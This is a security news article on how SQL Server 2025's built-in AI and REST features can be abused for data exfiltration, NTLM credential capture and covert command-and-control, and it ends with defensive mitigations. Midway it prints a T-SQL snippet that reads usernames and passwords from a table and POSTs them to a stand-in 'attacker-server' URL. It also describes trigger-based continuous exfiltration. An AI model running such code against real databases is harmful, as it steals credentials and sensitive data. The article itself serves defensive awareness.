A recent security analysis has unveiled alarming vulnerabilities in the newly launched Microsoft SQL Server 2025, particularly emphasizing how its native AI capabilities can be exploited by malicious actors. The analysis indicates that these features provide sophisticated means for attackers to exfiltrate sensitive data and establish command-and-control (C2) channels directly within the database engine, thereby considerably expanding the attack surface for post-exploitation scenarios.
The research was spearheaded by Justin Kalnasy of SpecterOps, who showcased how AI-driven features, aimed at streamlining contemporary data workflows—such as Retrieval-Augmented Generation (RAG)—are susceptible to misuse. These advanced features include the stored procedure sp_invoke_external_rest_endpoint, the CREATE EXTERNAL MODEL function, and AI_GENERATE_EMBEDDINGS. They allow SQL Server to engage in communication with external services via HTTPS, which, while intended for benign API integrations, essentially equips attackers with a robust data exfiltration mechanism.
The sp_invoke_external_rest_endpoint capability is particularly concerning. This feature allows database instances to dispatch arbitrary HTTP requests to external endpoints, with payloads that can reach up to 100MB. Although it is designed for legitimate API calls, this capability inadvertently permits attackers to create a seamless data exfiltration pathway. Once an adversary gains elevated privileges, such as sysadmin rights, they can stealthily extract entire tables or sensitive files and relay this data to infrastructure controlled by the attackers, all without resorting to more traditional tools like PowerShell or xp_cmdshell—methods that are more likely to trigger security alarms.
For instance, an attacker could employ the following SQL code to serialize sensitive user credentials into a JSON format and subsequently exfiltrate this data via an HTTP POST request:
DECLARE @payload NVARCHAR(MAX);
SELECT @payload = (
SELECT username, password
FROM dbo.app_users
FOR JSON AUTO
);
EXEC sp_invoke_external_rest_endpoint
@url = N'https://attacker-server/collect',
@method = 'POST',
@payload = @payload;This method enables bulk data theft, allowing for the loss of significant amounts of information in manageable chunks while minimizing the operational frictions often encountered with existing C2 frameworks.
In addition to direct data theft, the analysis further elaborates on how attackers can establish SQL Server 2025 as a persistent exfiltration platform. By utilizing triggers, adversaries have the capability to automatically transmit newly inserted or updated records to remote servers in real-time. This functionality facilitates continuous credential harvesting or data leakage, significantly reducing the need for repeated manual intervention.
The research also highlights another risky capability: the misuse of the CREATE EXTERNAL MODEL function to force NTLM authentication over SMB. By designating a malicious UNC path as the model location, attackers can manipulate SQL Server into authenticating against infrastructure they control, thereby allowing them to capture or relay sensitive credentials within enterprise environments.
More sophisticated methodologies further enhance these AI features into covert C2 channels. For example, adversaries can register an external model linking to an attacker-controlled API while utilizing AI_GENERATE_EMBEDDINGS for communication. By disguising malicious commands and their outcomes as legitimate AI embedding traffic, attackers can obfuscate their activities within normal AI workflows—an approach that complicates detection efforts, particularly in scenarios where outbound HTTPS traffic from database servers is routinely accepted as valid.
The introduction of these features marks a transformative shift in the operational dynamics of database systems within enterprise frameworks. Historically, outbound traffic from SQL servers was treated with skepticism, but the integration of AI has normalized such behavior. Consequently, traditional detection strategies are becoming increasingly ineffective.
To compound the challenges posed by these vulnerabilities, defenders are advised to reevaluate SQL Server security baselines, particularly in terms of privilege management and feature enablement. Key mitigation strategies include monitoring for the creation or modification of external models, auditing the usage of high-risk features like xp_cmdshell and CLR assemblies, and restricting outbound network access from database servers. Organizations that leverage AI functionalities should establish baseline traffic patterns to easily identify anomalies indicative of potential exploitation.
This analysis serves to underscore a more extensive trend: as artificial intelligence capabilities become woven into critical enterprise software, they create new pathways for stealthy and devastating exploitation. Without robust monitoring frameworks and strict access controls, these powerful features risk becoming significant assets for cybercriminals operating within trusted environments, concluding a critical need for heightened vigilance in cybersecurity measures.